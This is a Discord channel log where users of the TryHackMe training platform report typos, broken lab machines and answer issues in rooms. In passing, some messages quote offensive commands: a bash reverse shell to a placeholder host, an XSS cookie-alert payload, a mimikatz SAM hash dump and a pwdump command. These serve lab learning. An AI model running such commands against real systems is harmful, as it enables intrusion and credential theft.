#room-bugs

That's just answer tolerance.

Refresh the page.

worked 🙂

thanks

Found a trivial grammar mistake

Mistake: "For this reason it's usually good practice to run an Nmap scan with with --top-ports <number> enabled."
Room: https://tryhackme.com/room/furthernmap
Task: 7 - [Scan Types] UDP Scans
Location: 4th paragraph, second "section" of the task

@obsidian kiln

Whoops

Fixed

Thanks @final loom

No problem! Not trying to be a grammar nazi or anything, just want to help 🙂

Haha, yeah, I'm a stickler for grammar myself. Always happy to have errors pointed out 👍

hello dears, anybody has this error on Empire room?

It's telling me that the flag 7 is wrong

Room LinuxCTF

Which module were you running? We might have forgot to mark the required powershell version on it.

i try to run Seatbelt module

That module is a mess

It works well when it works

and what about winPeans?. Because i have the same error when i try to use winpeans

That sounds like an issue with your empire install rather than module specific

thats strange. Because i use the last module of empire available on bc-security github

[Version] 3.6.3 BC Security Fork

@candid canyon would know better than me

They should both be running, I've had both of those running recently without an issue. What version of PS is on the target box?

It's cut short. Therefore what you're entering is wrong.

PS > Get-Host

Name : MSFConsole
Version : 0.1
InstanceId : 77d0a391-a19b-4b71-8eb1-ec55a327bfd5
UI : System.Management.Automation.Internal.Host.InternalHostUserInterface
CurrentCulture : en-US
CurrentUICulture : en-US
PrivateData :
IsRunspacePushed :
Runspace

What type of box is this, it's just that version .1 seems really odd.

i try to solved the empire roomp

Are you running inside of a meterpreter session? Msfconsole as the name just wouldn't show up until you had metasploit somewhere.

@warped ibex might be able to help me out. This is a new one for me lol

sure

@candid canyon maybe the problem is due to that version of powershell?

Yeah that's what I was trying to see with your response but that raised more questions.

But because those modules have embedded compiled code you have to run in a more modern version of PowerShell.

sorry I didn't think they were different versions

Wait this is on the box in the room right?

I think blue is a windows 7 box it might not be running powershell 4. I wonder if that’s the problem but then again no one has reported that yet?

thats right. Empire room use blue and this box is windows 7

Windows 7 SP1 should have a flavor of PowerShell 5. It was added in SP1, my mistake.

hmmm that might the problem. Can you run “$PSVersionTable” for me?

or maybe you need this results:
(empireadmin) (get-host).version
Major Minor Build Revision

2 0 -1 -1

mitre room
Task 2 - "e.i" instead of "i.e"
Task 3 - Grammar / Typo - "Instead of Mimikatz, what OS Credential Dumping tool is does this group use?"

Huh @tawdry obsidian it says your PS version is 2 which the modules aren't compatible with. Did you run a downgrade module with metepreter?

@twin tapir and @candid canyon are right. Windows 7 should have a flavor a PS 4 which should work with those modules

btw Get-Host returns information on the program hosting the powershell runtime so when you are doing weird offensive things it's not the most reliable source of info

https://tryhackme.com/room/windows10privesc - Task 11 SAM - on the version of Kali I installed recently, the hashdump.py works correctly from /usr/share/creddump7 so that info may need changing (python-crypto not found with apt install either so may have been moved or on a non standard repo?)

Hi and Happy New Year all.
https://tryhackme.com/faq
Doesn't Streaks work differently now ?!

that's how it always worked, the difference is now it's in your local timezone

Hi szymex73 I think they changed that a step further as according to this post. (not based on 24h countdown but reset on midnight local timezone now ?!)
#announcements message

However, this only effects new signups 🤔

that's strange part tbh , I registered before that change and do not have countdown anymore .

ah the countdown seemed to disappear for eveyrone after that update

I just wing it with the timing tbh

😄

btw do you know what is and how does work 45 day streak 5% swag off ? Couldn't find more info on page about it ?!

so after you reach the 45 day streak you can send an email to support@tryhackme.com with info that you reached it and get a 5% discount on thm merchandise

ohh ok , just hit 45 day streak , thanks mate and Happy New Year

so after you reach the 45 day streak you can send an email to support@tryhackme.com with info that you reached it and get a 5% discount on thm merchandise
@acoustic fjord my streak rate 71

Not necessarily a bug but the forensics room has a fair number of spelling and grammatical mistakes

There's several forensics rooms, please link it and point out specific examples so that they can be fixed.

No worries, I'll sign on to Discord on my desktop

https://tryhackme.com/room/forensics

"What is the last directory accessed by the user? (Just write last folder name as it is?" - Missing end bracket

"Dig little more..." - Dig a little more

"There are many suspicious open port, which is it ?(protocol:port) - ports instead of port and removal of the space before the question mark The hint for this question should also be corrected to "write the first one"

"In lats task you have identified malicious processes, so lets dig into them and find some IOC's. you just need to find them and fill the blanks (You may search them on VirusTotal for more details 🙂" - lats needs to be corrected to last and the you in the second sentence needs to be capitalised

There might be a couple more but I'm second guessing myself a bit

There's something super weird there

Just thought it might be worth mentioning

Yeah it's an ancient room wow

It's listed in the new Cyber Defence path, so it has been resurrected 😄

@dusky junco This room looks like it needs a serious overhaul IMO

https://prnt.sc/wfg1e2

https://prnt.sc/wfg1kp

80 doesnt work

#room-help

room : owasptop10 task 20 question 2, it keep saying it's not correct but actually it works

Use the payload, enter the flag you're given

ohhh damn thanks mate 😄

Room: Break it
Task 1

[Insane] 

The text is inside the Pastebin https://pastebin.com/kKkr9SJL

pastebin not found :d

Hey @subtle imp I have the text which was inside of the patebin, would you like me to DM it to you? In the meantime, I'll try to get it sorted :p

yeh sure

Awesome

Wait a little longer for the VM to fully boot

There's another service that hasn't properly started there

ah okey thanks 🙂

yeah, now it works

I think there is a issue in fundamentals of linux room exactly in vip challenge room there is a mp3 file names flag32.mp3 I think that file is corrupted even though I downloaded the file to my web attack box there was no sound output

There are tools online that will listen to your mp3 file and give you a text back back, maybe try that way?

I got the flag I thought it was a bug that's why I mentioned it here

because I could hear the error sounds

ohhh, i think i might've misread what you said! Now it makes sense

😄

Hey guys! I think a found a bug on the biohazard room

||In the website where you find the crest4, it says Crest 2 has been encoded twice and contains 17 characters, nut it should says crest 4. (http://IP/attic909447f184afdfb352af8b8a25ffff1d/note.txt)||

*but

I found a grammatical error in Linux Fundamentals Part 2 Task 14 - respectively

It may not be that important though

Room Network services 2, task 9, "select module()" should be "select version()"

i think there might be a typo in the answer field in the new room windowseventlogs.
section: 7
question: What is the Execution Process ID ?
I think the the first number of the answer might be typed double

Room: https://tryhackme.com/room/windowseventlogs ->Task 1 -> "If you don't know exactly what a SEIM is used for, " rename SEIM to SIEM ;)

For the room Splunk,Task 2 last question "what is the website where you can find the Splunk forums at?". I think they changed it to community.splunk.com instead of answer.splunk.com

@ornate wigeon that room is undergoing an overhaul now no point in updating it

oh damn!

okay okay thanks for letting me know! @twin tapir

When does the splunk overhaul take effect?

Has not been scheduled yet.

@glad badger is it still of value to do the room?

If things have changed, you might get stuck with answering some questions that are no longer valid.

Fair enough thanks

I think there may be a room bug in the room "CC: Pen Testing" (/room/ccpentesting). Specifically, in Task 18 "What is the value of the flag?". Using sqlmap as instructed, the current box I'm targeting ("Machine 3", 10.10.108.80) lists no entries in either the "msg" or "lol" tables of the "tests" database when I dump it. However, in looking at an online walkthrough, the flag should be listed under the "flag" column of the "lol" table. Did the database data for this box accidentally get adjusted?

It's buggy, but the flags are there. It's something with sqlmap

ok, thanks for the quick reply!

dogcat has only port 22 open?

nvm, it took longer to boot http server

room Empire image not working https://assets.tryhackme.com/additional/attack0.png

First image on task8 module

can confirm

Hello, the Windows Event Log room probably has a bug in Task 7 (Question 6) the date in the evtx file does not work as an answer to the question.

@dusky junco not sure if it just a single instance or something with the box, but the machine I had running in Investigating Windows kept trying to install .NET Framework 3.5

Please DM me a screenshot of the answer that you are trying to copy from the evtx file.

Ok!

Thank you. I will ask why it isn't working and get back to you. @dapper rose

Hello every one, i am doing OWASP 10 room (https://tryhackme.com/room/owasptop10) and on task 20 ( [Severity 7] Cross-site Scripting ) and 4th question i use this script (||<script>alert(document.cookie)</script>||) but it doesn't show any pop-up and also shows Loading... instead of comments

what is the problem?

Please avoid pinging THM staff

@wise ore

If I think the wording of a question in a room is misleading, should I post it here?

Yes 🙂

So, on "introductory researching/vulnerability searching" the last question is about "a 2020 buffer overflow in the sudo program". Although it's true that there's a pair of 2020 entries in the exploit DBs, the CVE is actually a 2019 one.

It's a 2020 buffer overflow

With a CVE allocated in 2019

Ok, so the CVE was discovered in 2019, but the exploit was written in 2020, correct? Makes sense.

The vulnerability was published in 2020, in like January @pallid tide

The exploit doesn't matter

Ok, thanks for clarifying.

@dusky junco , https://tryhackme.com/room/relevant keeps sassing me, and shutting itself down.

I'm messaging you because of this.

Yeah, that one is designed to trip people up and make sure you really are researching 🙂

Hey I think I found a bug over at the Linux Fundamentals 3 room.

Refresh the page

answer tolerance

Does 'Relevant' crash whenever using something like winPEAS.bat for anyone else?

AdventOfCyber 2019 [Day 21] Reverse Elf-ineering
aa got r_bin_file_hash: file exceeds bin.hashlimit and Invalid address from.. something wrong with my radare 4.3.1.

tried on AdventOfCyber 2020 with radare version2. didn't have the problem

Yup! Appreciated. Thanks for the pnig. I've taken note of this

#room-hints message

^ Moved from room-hints to room-bugs because i feel like this now belongs here. Given that other users (seemingly) are facing the same issue.

Looks like i found another feature 🙂

So. i tried rebooting and from the looks of it, the size of the log varies. Thus (perhaps, not an expert) it looks like this also changes the number of event logs.

This is the size of the logs as stated in the room instructions.

This is the size i get when booting the machine. I noticed this size differs from the very first time i booted the machine (but i didn't screenshot that, and the machine crashed).

I also see difference in number of events through different deployments of the machine.

That’s due to powershell constantly adding events

@obsidian kiln / @dusky junco you wanna just delete that question for now so that it can make it easier for users

In Corp room, the command to find the SPNs is giving me an error

However even the writeups use that exact commands

Idk if this is a bug or what. But to me this looks like there are two open ports (21 and 80) but THM says that there are none open

https://paste.md-5.net/xujawihuja.pl

room? question?

yes happend me

from what room

idk

it was a room

i tried to try all numbers and it worked like tha

scanners showed 2

answer was 1

network services, enumerating Telnet, question 4

Now re-run the nmap scan, without the -p- tag, how many ports show up as open?

@upper venture

that one

I do nmap [ip] -A then get what I postd

thats wierd

i got 0 ports

are you sure the answer was actually 2 and regex just accepted 1?

always refresh whenever you think an answer is off

Huh

That is weird

Could it be because I have another nmap running?

are u sure u deplyed the correct machie

this one

Well

I am pretty stupid

why?

LMao I had the FTP one deployed

My bad

u got it

Thanks for working it through with me guys

🙂

https://tryhackme.com/room/ccpentesting
Task 20
Question 7
The correct answer should be "--download" not -download

It is correct

just refresh the pae

@amber onyx

Hi,
I think there is a bug in the following room.
Room: ZTH: Obscure Web Vulns
section: [Section 3 - JWT]: Challenge!
Descr:
The purpose is to sign the jwt token with the found public key.
Bug:
When visiting the site, you get a JWT token that you need to alter and sign with a public key. This token refreshes each time you refresh the page.
If you just paste this token for verification you get the flag, whiteout doing any altering.

https://tryhackme.com/room/introexploitdevelopment The target machine in this room doesn't seem to work at all. The homepage doesn't loads completely after logging in. I've waited for more than 30min for the server to respond and refreshed the page several times but it doesn't budge at all. I was trying to complete this room previously last month but had the same problem

Are you connected to the VPN

@livid rune I had the same problem. I solved it by using mimikatz and running this on the Windows VM. I used the same python SMB trick from task 2 to serve "/usr/share/windows-resources/mimikatz" from my Kali instance, then run this mimikatz command "mimikatz # lsadump::sam /system:C:\Windows\Repair\SYSTEM /sam:C:\Windows\Repair\SAM".

Wrong URI :-)

Does the link work

@dusky junco Cmnnnnnn

Thanks @hazy tiger (:

Resolved (: was an editor bug

Thanks CMN

Yes I am.

@dusky junco Did you have the chance to check out the first URL too? Looks like what the author meant is (https://www.flaticon.com/authors/freepik). And not the website @ freepick.com.

Thanks for that @plucky jay I've updated that too

Good catch -- that's an oversight on my part

Welcome :-)

I've updated -- a refresh should do the trick

Yes, confirmed that it changed

Gonna be cheeky. Having reported 4 (qualified) bugs in the past few weeks. At what point do i earn the 'Act of Kindness' badge? :-))))) @dusky junco

Hehe, we reserve that badge for those who do giveaways and the likes. The only reward outside of the bug bounty programme is a pat on the back and appreciation from us (:

Although let me take a look back and I might pop you a DM (:

I understand! Worth a shot ^_^ Thank you!

Relevant seems to just stop responding after some time. I originally thought that this was because I was running winPEAS, winenum, or any of the other privesc scripts. I started manually entering commands, and he machine stopped responding. I had over 30 minutes left according to the room page. I hope this info helps in some way.

The site was taken down iirc

Maybe someone knows Rudolphs breached password

Room & Task? @sour glacier

Ah I got it

@dusky junco scylla.sh was taken down after being reported (iirc), https://tryhackme.com/room/adventofcyber2 Task 19 Question 10 relies on the website, are you able to remove the answer?

Advent of Cyber: day 14 Where's Rudolph
found the video and he said the correct answer

Also please delete the picture @sour glacier as it contains answers.

tim

It doesn't need to be deleted

It's not in the help channels + has spoiler tags

for greater good

It's meant to be to demonstrate the issue

Thanks for your time @hazy tiger

It's a known issue. I've requested it previously for the question to be annulled.

deleted the picture @glad badger all safe

https://tryhackme.com/room/flask - Task 4
markup, not markdown

Task 6, the magic MACHINE_IP is not replaced by the IP address after deployment is completed.

I count at least 4 of us having no luck with task 9 of https://tryhackme.com/room/windows10privesc during the last couple of days. There's a user name but the question claims there should be a password too in the registry yet it is not there.

I had the same issue with task 9 too.

Hi #room-bugs Im having an issue on room https://tryhackme.com/room/networkservices, on task 6 you can deploy a machine which on task 7 you can exploit, basically when connecting via telnet to ip and port 8012 you should get a message saying "skidy's backdoor" I got it the first time I was doing the task, but in later machines deployed I am not getting it anymore so I assume it is a bug and not sure where to report it. If anyone could test just in case that would be great

That room link doesn’t seem to work

As well as that

Please run the VPNscript to make sure your VPN isn’t causing any issues

!vpnscript

I am connecting via telnet, but not getting the welcome message, so I assume it is an issue of the automation of the deployed machine, via web kali or attackbox I get same result.

Are you able to type at all

Like .help

I can but dont get anything

you get something?

Here there is no room bug

U have to type in capital .HELP

I know but for sure you get the welcome message after you telnet, right?

Yeah

ok, recreated the machine for 3rd time, now it works

very weird

thanks for your time guys!

Hey,
Idk if this is a bug but I notice this in OWASP top 10 (Task 28)

The order of the text and images is wrong.

Likewise :/

hello all, is there a problem with the relevant box? i was working on it and suddenly no connection anymore? this happened before.. i tried to ping it but unreachable.. im connected with the tryhackmebox

If you're not a subscriber, you get 1 hour a day on the AttackBox.

I've tried terminating and restarting the machine with no luck

typo: /room/ultratech1
there is no port 8080 running, it is 8081

task 2 last question

I'm in the Authenticate room and the page on port 5000 doesn't give me a cookie... it did before and it expired and I restarted it and now I don't get one

Hello, I don't know If Im in the right channel ( tell me if it's the case )

I'm currently doing the " AttacktiveDirect " machine and, at Task 7 " Elevating Privileges " at the question "What is the Administrators NTLM hash?" It keeps telling me that I put the wrong answer while it's the correct one, I've also checked many writeups on YouTube and it seems that it's only happening to me.. what can I do to validate the box ?

Thanks !

refresh the page and try re-submitting

it should start and end with
0e03[snip]bcb4fc

i am a subscriber, no there is something going on with this box, as it just shut down after about n hour.

Did you extend the room, it expires after 2 hours? Same with the AttackBox, it has to be extended after 2 hours.

yeah i was only like 1,5hr into the box, there was still about 30min on the box itsels, and everything was working good.. i was busy doing some scans, and the attackbox was extended.. it suddenly just was not there anymore.. no ping not alive anymore..

Which room was it?

relevant

Could be many things. Try re-deploying both and see if it happens again.

will try it out tomorrow again, see if it happens again. thanks

I'm in Authenticate room and I'm not getting the cookie in the developer's tools even though I can authenticate as user/guest, any idea as to why?

The room Alfred is missing the root flag. Can't complete the room.

As you can see here. Here's the URL: https://tryhackme.com/room/alfred

Not a bug. Make sure you’re nt authority system and migrate to another process owned by system

I tried a ps migrate and also tried getsystem, there is no flag. I'll try it again after work I guess.

Many of the code examples are not shown in this room

https://tryhackme.com/room/ccradare2

I've got a bug in History of Malware room , in spite of entering wrong spelling it's declared as a correct answer

Refresh the page

It will correct it

thenksss @topaz thorn

good morning: relevant room, same bug as yesterday, its suddenly down again. host unreachable.

Are you connected to the VPN?

atatckmachine

Have you used -Pn while scanning with nmap?

0 host up

screenshot

How long was the VM for relevant up for? @wheat fractal do you remember the IP address

about 1,5 hr, IP 10.10.182.8

Thanks bare with me

a little bit after 1 hr it just shuts down, and loose all connection.. same yesterday

time to lunch anyway 😉

Ah yeah, I see the issue. It's licensing issues which I thought I fixed throughout the week.

I'll get this resolved -- thanks @wheat fractal & @hazy tiger

Thanks CMN

Sorry I was dealing w/ something :3

Not at all -- all on me (:

okay thanks, thanks all!

btw i have restarted the room, and there seems to be all the time a connection error after 30% scanning.. when doing a gobuster scan on the ip/correct port, which makes you discover the share directory.

needless to say that you get stuck then, for hours haha.. as this is they way in..

This room: https://tryhackme.com/room/nislinuxone requires info from this room: https://tryhackme.com/room/zthlinux which is now private

Fixed @blazing raven 👍

https://tryhackme.com/room/introtonetworking in networking tools dig portion there is a picture missing, source for missing image is supposed to be :https://muirlandoracle.co.uk/uploads/2020/03/dig-demo.png but opining the link suggests that it may have been deleted from that website.

@obsidian kiln https://muirlandoracle.co.uk/uploads/2020/03/dig-demo.png

Oops

Thought I'd already got all of those

Gimme a sec

Fixed

thank you

While a small amount of users had issues with EnterPrize I improved the response for enumeration and fixed the two unintended ways to root 🙂

Wow, you go!

Have you had a tester run through the reupload?

It was a modification I did with Skidy without reuploading and tested it three times - one last time just now completely from scratch the whole room with a new deployment.

Should be fine, but just to be sure, mind giving the original tester a ping to just have a quick run through it again? 🙂

Protocol as much as anything else 🤷‍♂️

Sure @heavy spade feel free to verify the changes

@stuck stirrup if you wanna, go for testing it :)

Will do now

Could you share what the unintended routes found were please? Could be interesting to hear about - especially as they no longer work. @cerulean hill

@dusky junco Intro to Windows, Task 3, spelling error "Authentication method that assings a ticket in order for a user to login?" should be assigns

Hey, I'm not still not really sure where I should be finding that root.txt. I feel like the lesson was different before. Should I found that file on Linux1, Linux2, or Linux3?

Looks like there used to be a room called Learning Linux and one of the bonus tasks was to find root.txt. I'm guessing that room got split into 3 rooms but none of those rooms asks you to find root.txt. I think it would be best to remove the question, explain that we need to gain shell (but these is an intro lesson), or add the bonus back to the Learning Linux 3 part series

Would I be correct in thinking that the other two questions in that task are fine?

Yeah I was able to find those referencing the answers I had already found in the other rooms.

@dusky junco https://tryhackme.com/room/windows10privesc the VM teminates your session after an hour and you can't log back in.. "It's literally your job" as the meme goes. I was told to report this to you . Thanks

Not so much of a bug, but just a suggestion. The Task orders in the Rustscan room seems a little off. i.e., covering Rustscan scripting well before covering basic Rustscan usage. /cc @green steppe

Not sure is a bug, but at Task 7 of https://tryhackme.com/room/zthobscurewebvulns I can't run any manual exploit, all of them results in an "Internal server error"

Room: introexploitdevelopment, Task: 4, Bug: Missing Right Parenthesis.

historyofmalware room task 8 -> a common file extension for executables was ".COM". Similarly to how a BATCH file or a .sh file would work, this extension allowed text files containing commands to be executable.

I think the .COM was not like sh or batch scripts but its like EXEs and ELFs which are binary not plain text scripts.

Well yes but no

It was both at different times

yes

but my question is isn't saying this wrong that .COM will run like .sh or BATCH file taking plain text as input?

Key word similarly

Similarly meaning that they execute commands

Okay I got it

should improve my grammar... lol

It's a bit unclear, and COM files became binary files

They'll probably be binary files in this context

It was meant to establish common ground for users who want a better understanding

Room: introexploitdevelopment, Task 4. payload is a variable name but here in this example it is being used as a function name. There might be a mistake here I think.

@maiden sorrel
#room-bugs message
#room-bugs message
🙂

On rustscan, I think the answer to the second question in the quiz needs updating

Would help if you provide screenshots and more reasoning

Room: introexploitdevelopment, Task 4. The hint of the last question says that <&1 in the payload bash -i &>/dev/tcp/{lhost}/{lport}<&1 is to keep the shell running, but it's not quite true. <&1 is being used here to redirect the outputstream (which is logically the input of server computer coming from the other end of the tcp socket) to the inputstream of the bash shell.

I swear I already told him about that one

The accepted answer threows an error and the repo states that the command has been updated

I'm not sure wether it's a bug but the new Intro to Windows room doesn't award any points https://tryhackme.com/room/intro2winzq

Nah, not all rooms award points

the function and variable are both named payload, i can change if thats not best practice.

thanks for pointing this out. i updated the room and included the correction.

But there is no function named payload in the program 🤷🏻‍♂️

You're Welcome ^ _ ^

Also the target machine in that room is very slow and the homepage just freezes and stops loading completely after logging in.

Oh ..My mistake... didn't notice it.

yeah @dusky junco mentioned this. i tested it on the site and locally. it did lag for a couple minutes then loaded fine, other than that didnt have an issue. i think CM said they might put more resources towards it im not sure.

Oh okay.

@dusky junco You have a small typo in the intro2winzq room. File Permissions, first line, "FIles" with a capitol "i".

Also, for Built-in utilities, you are missing a space for "Performance Monitor -Using". Between the dash and the "U" in "using".

Room: https://tryhackme.com/room/owasptop10
Task: 26
Step 2: Clicking on the "vim" anchor tag does nothing, the directions say to Then, left-click on the URL in "Exhange your vim" found in the screenshot below.
Resolution: Step 2 needs to be rewritten to say click on the feedback link, and the screenshot needs to be updated.

Either that or the vim link doesn't actually do anything. No cookie is being made as it says in the directions? It does make the cookie. encodedPayload is being made, but only after visiting and posting to the feedback page.

Tag me in your reply so i can come back to this later.

In the room WEB APP TEST (tryhackme.com/room/basicpentestingjt) 4th question says
User bruter-forcing to find the username and password
Shouldn't it say USE instead of USER?

@oblique hemlock See #room-bugs message

yeah i could use that, however, mimikatz is not the way they describe in the task, hence my message. Thanks for linking it tho. Maybe i should have searched before typing my message

Yes, the windows10privsec room does seem to have a couple of bugs.

Windows PrivEsc- shuts down after a bit more then an hour.. at least the remote connection

when the room has still enough time on it

Hi all, somebody tried to do OverPass 3 ?

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

wait did that room release

thanks

Yes 🙂

oh gnarly

@maiden sorrel Room: introexploitdevelopment, Task 3, A bit of correction here. The second request in the ruby code in both the check() and exploit() is not a POST request, rather a GET request by default as the method is not specified, but using a POST request would also work fine for this scenario.

How is answer to ICMP ping No I got a ping shouldn't it be Yes

Where did you get that IP from?

@modest mica

It's from the deployed machine all other questions (except another Y/N I have already finished the room) were the right answer like number of open ports and such so it's not the wrong ip

I can't see it under Active Machine Information so I'm not sure...

But perhaps try actually pinging it with the ping command?

or @obsidian kiln is this security groups again?

Yeah, it's because Windows is considering the AttackBox to be on the same network

It's dumb

ping command doesn't give output only shows first line : PING 10.10.24.186 56(84) Bytes of data.

So it doesn't seem to respond.

Also, if you could clarify it to ICMP Echo requests, because ICMP does a bunch like dealing with closed UDP ports

Yes

So that means the answer is no.

So I think(?) that's your question answered there?

but the question asked to use what I have learned and ICMP and in the this room it showed the nmap way not the ping command that's why I got confused

Ok, so long story short

Windows firewall treats the attackbox slightly differently than if you pinged it from your own machine when VPN'd

And it doesn't respond to pings.

Ok thanks.

https://tryhackme.com/room/breakit - Pastebin locations no longer there

Ref: https://sckull.github.io/posts/breakit/

I just copied and pasted the code from the input string? Never did the room, but i'm assuming thats what you were looking for?

ya, works for me but should get a perm fix to it

agreed

but i can confirm that the pastebin link is broken.

Nmap room has a grammatical issue.

"Note that the arguments are separated by commas,..."

Typo! :-) @dusky junco

https://tryhackme.com/room/windows10privesc has bug. Password cannot be find in the registry.

Nevermind 😉 in the next step i got it out of the SAM with mimikatz 🙂

Appreciate that Cold - will resolve. Been away w/ sickness so catching up on things

how to submit bug?

Room:
Task:
Bug:
Proof:

works for me

you tried rn ?

yep

i tried with different browsers but still not working

maybe issue my network

sorry

XD

possible you're in a country that blocks soundcloud?

I'M FROM india

ohh

I think there is a problem with ZTH: Web 2 room. if I put anything in the credential it will log me in. 👀

Room: linux1, Bug-type: Information mismatch. The task context says that the binary file outputs noot but in the example, it outputs Hello.

Is it worth mentioning these types of small errors?

small errors are fine to mention but in this case the screenshot didn’t match the question as it would just give away the answer it is an example rather than showing what is supposed to happen

Oh okay.

Room: linux1, Task 8, There's a small typo here. Probably the sentence should be : These shortcuts work for every .....

Anytime @dusky junco , wish u good health!

https://tryhackme.com/room/introtonetworking

What switch would you use if you wanted to use TCP requests when tracing the route?
The answer was -t but shouldn't it be -P ?

Task 7. @obsidian kiln what do you think?

Having same problem with the room. Can’t crack any hashes either.

Refresh the page. You've got the wrong capitalisation and answer tolerance doesn't notice

That can be made clearer though. Gimme a sec

@obsidian kiln Ok the apple man traceroute doesn't have the -T, thats why it drove me crazy

I, uh, just screenshotted the manual page for the Kali version

God knows why you're on the BSD version

Yea, I should use the attack box but lazy wins 😆

No idea what's on the AttackBox -- that's Kali though

Grammatical issue on Intro2windows Authentication method that assings a ticket in order for a user to login? Should be assigns

Would be helpful for the site staff if you could provide a screenshot, room link and task.

Task 3 question 4 https://tryhackme.com/room/intro2windows

Task9 https://tryhackme.com/room/windows10privesc Password is not in the registry. I already relaunched the machine and confirmed with regedit.

OWASP Top 10 room by @ Ben
Machine From Task 21 OWASP10-A8-CMNatic

If one was to navigate to the http://MACHINE_IP/admin page without a cookie, then the flag was also shown

I can confirm this bug. Just tried. I also receive "invalid syntax" on the THM attack box when I copy the python command:

python -c "exec("import base64\nimport binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('5c26be61ae3øc31øø96e2be5d7cbø6c2eø2ø5ø4ø1cac51ø24fefc1466afba273')).replace('=')")"
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "<string>", line 3
print base64.urlsafe_b64encode(binascii.a2b_hex('5c26be61ae3øc31øø96e2be5d7cbø6c2eø2ø5ø4ø1cac51ø24fefc1466afba273')).replace('=')
^
SyntaxError: invalid syntax

It's a python2 script

Run it with python2.7

Put it into a .py file

I mean that aint gonna fix it

I read that wrong...

sheesh...

Yep, using python2 worked 🙂 Might be beneficial to specify it in the guide 🙂 Thanks!

python used to be python2

It's a change that's super recent and doesn't apply to all machines

Many will have python be python2

Got it 🙂

Can someone confirm on whether the issues with the Windows PrivEsc room on the Beginner path are going to be investigated? I’m 99% of the way through that path and this last bit is killing me.

/room/rustscan claims that all you need is the helpmenu but it is not true. Because the answer for question 2: what switch enables quiet mode? and its answer (namely ||-q||) is not in the help menu. And rustscan doesn't have a man page. I read online that quiet mode has been renamed to greppable but it didn't accept -g either

-g?

This is still an issue. I understand you can get the password in Task 11 but then what's the point of Task 9?

Task 9 of the Network Services room 2 asks for the output of the "select module()" option for an exploit because this option is allegedly set by the default in the exploit, but it is really asking for the output of the "select version()" option. "select module()" simply returns an error as there is no database selected by default.

Hey guys I am currently doing the BLUE room and everytime I run the exploit it successfully runs the exploit but fails at the connection. I've refreshed my OpenVPN connection several times and I've also terminated and rebooted the target machine to no prevail.... any thoughts?

RustScan room Task 8 - quiet mode is no more; it was replaced by greppable mode in the latest version.

#room-help

https://tryhackme.com/room/crackthehashlevel2

same hash

Seconding this

Ok saw it.

I'll work on it.

Did the entire room get reset? Now it says I haven't completed

Yes

Yes currently reseting it because there was people "cheating".

The hashes of the last task will be changed.

😄 I learned from this site!!

I was wondering how it was possible that it was completed so quickly.

aww mang, was just about to get to Task 4

Agreed. Kinda lame. I put in like 3 hours into it already.

these things happen, am not mad

was enjoying the room, it should be back once the changes are done

yup, very enjoyable room. Haiti is a beast of a tool

ya, i learned a lot of john. i want to learn more about those rules. a room about them would be awesome

I'm very sorry for the disturbance. A cache leak spoiled the party. I'm re-working on last task.

@teal barn thanks its a good room

@teal barn please update the task where you have to cewl the "last word". First, the example.org is down atm and second, the output is random if the sites are updates, making it a quite difficult to guess.

example.com is identical to example.org

it's also normally a static site that doesn't move

not down and not random

@wheat fractal @blazing raven @runic parcel @civic brook @crude kiln @rotund fox
Room fixed and back online. Enjoy it!

already back at it

@lucid oasis Not sure if I could pester Dark about this or just you; There is an incorrect pluralisation on the Web Fundamentals pathway enrolment page.

@next bluff Swafyy, you've got a grammatical error in the Introduction to Django room. Task1 Django can automatically compile HTML code, therefore making it possible for anyone without any advanced knowledge in markup languages develop a website.
Should be "without any advanced knowledge in markup languages to develop a website"

@eternal summit Is the sentence "The public key is n and d, the private key is n and e." from your Encryption - Crypto 101 room's Task 6 correct? I was reading more about RSA on the blogpost you linked and MuirlandOracle uses (e,n) as public and (d,n) as private, and it makes more sense to me, so for about 5 minutes I got really confused because the letters seem to be reversed.

Google Dorking has a small typo. Task 3. Subpoint 3. One "(" is unclosed

Kudos to the room creator tho, loving the room

Fixed ❤️

Nice spot, fixed:)

thanks man

in windows privesc -> TASK11
python2 creddump7/pwdump.py SYSTEM SAM commands throws error on Kali inBrowser machine

struct.error: unpack requires a string argument of length 4

In VM i am not able to install python-crypto

Seems like the package is not available in the repository

I am not able to proceed further to get the HASH

I had this issue as well. Two bugs in the one room.

Would really appreciate some help from anyone who has managed to workaround the issues and get the admin hash.

it's because creddump7 is built for Python2

you can try this and see if it works:
https://github.com/ict/creddump7

make sure to run it with python3

It needs Python-crypto package and it can’t be installed as it is described in the room instructions hence the bug.

Impacket works so much better for this I have no clue why they’re using a deprecated tool

It’s one of the rooms on the Beginner path so if you are a beginner like me, it’s not a great experience. Think the room is quite old so probably just needs a review.

Managed to get the password now - I will stop posting 😉

Strange things happening with Buffer Overflow Prep room

tried to run the sample pythoncode and got the program crashes as soon as it started..

on the first 100 mb. I certain there is an issue...Any help around ???

Hey so when enrolled in the Cyber Security path, The progress meter at the top reflects the current level of completion but rooms that I had already completed do not show as such in their individual progress meters. If you navigate to the room you can see that you have done it though. Small bug but figured I'd mention it.

Found a bug in the Network Services Room. Task 3, first question about conducting a port scan accepts an answer if you put nothing in the space.

Platform bug not a room bug

In the room SmagGrotto there is a root flag in user shell

Ran in to some problems in Cicada-3301 Vol:1 - around question 6. I cracked the file. As I could not crack the hash, I looked at the write-ups. They seem to get the same result as I got (regarding the hash), but when I try to use the online resources I get no results. I then tried to hash the url the others found and I get a different hash (this hash then returns the correct url og cause).

are you sure? it wasn’t before and i havent changed anything 👀

hey hi guys

im just started linux fundamentals part 2

and stuck in connecting to ssh by putty

it says connection timed out

#room-help

hey!

as per the instruction provided in the room GoldenEye on getting reverse shell user must be able to download exploit via Simple python Server. But it is says permission denied.

Try saving in another directory? /tmp for example.

thanks... i dint try saving it in tmp

@tough linden Hi there. It seems a number of users are struggling to get the reverse shell to connect on the WindowsPrivEsc:(AutoRuns) task. I've connected without authenticating, and with authentication, and nothing happens. Not sure if I missed anything ...

@slate parrot let me check

Thank you 🙂

@slate parrot works for me

may take like, 10s after logging in

but it triggers

you're logging in as admin?

Nothing triggers for me — a search here shows other people having the same issue.

Logging in as user.

try logging in as admin

There are no admin creds for that box (at least until Task 7)

ah

The task also says not even a need to log in to trigger the reverse shell

